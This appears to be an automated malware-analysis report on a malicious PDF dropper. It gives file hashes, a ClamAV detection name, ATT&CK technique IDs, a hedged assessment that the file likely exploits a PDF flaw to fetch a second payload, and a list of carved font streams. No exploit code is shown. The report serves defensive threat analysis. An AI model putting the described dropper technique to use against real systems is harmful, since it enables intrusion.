PDF malware analysis — malicious · 48d3ce4ba383f281

MALICIOUS

PDF

43.3 KB Created: 2017-08-29 09:04:21 Authoring application: PScript5.dll Version 5.2 (via GPL Ghostscript 8.15)

MD5: b85e2bfa031c39a76d11f832a066b402 SHA-1: 8dfe02a788489b4166ebb7f131c5a7aa2cce8477 SHA-256: 48d3ce4ba383f281703d30d39a0221286f2228b338b992f203dcf218f680e6d6

60 Risk Score

Malware Insights

MITRE ATT&CK

T1566.002 Spearphishing Attachment T1204.002 Malicious File

The file is identified as a malicious PDF by ClamAV with the signature Pdf.Dropper.Agent-7257292-0. The document body is heavily obfuscated and unreadable, suggesting it is designed to hide its malicious intent. The presence of embedded font streams is common in PDFs, but in this context, it may be used to package or obfuscate exploit code. The primary attack pattern is likely the exploitation of a PDF vulnerability to download and execute a secondary payload.

Machine Learning

Nyx PDF Classifier clean score 0.0001

Heuristics 1

ClamAV: Pdf.Dropper.Agent-7257292-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Dropper.Agent-7257292-0

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`font_00_cff_off00006b15.bin` `a6505192114922a765b3c4c5264d803089e44eb64e2c59f950fd6fb797069a8e`	pdf-font-stream	PDF embedded font (cff) at offset 0x6B15	3422 bytes
`font_01_cff_off00007710.bin` `2d5654163f6b2b66fa9ac61e63d545d858801738382f05b25ce15c954f09b846`	pdf-font-stream	PDF embedded font (cff) at offset 0x7710	2275 bytes
`font_02_cff_off00007f4d.bin` `40b685bc77349df0a43e9b86e7bcc512f73580ff51fe888f99c6502a08b19ad7`	pdf-font-stream	PDF embedded font (cff) at offset 0x7F4D	2854 bytes
`font_03_cff_off000089ee.bin` `7c279663ac55e1071d11f07d731e7f1a843bed0d49bf97e5724c4b7e2b87d3af`	pdf-font-stream	PDF embedded font (cff) at offset 0x89EE	5644 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.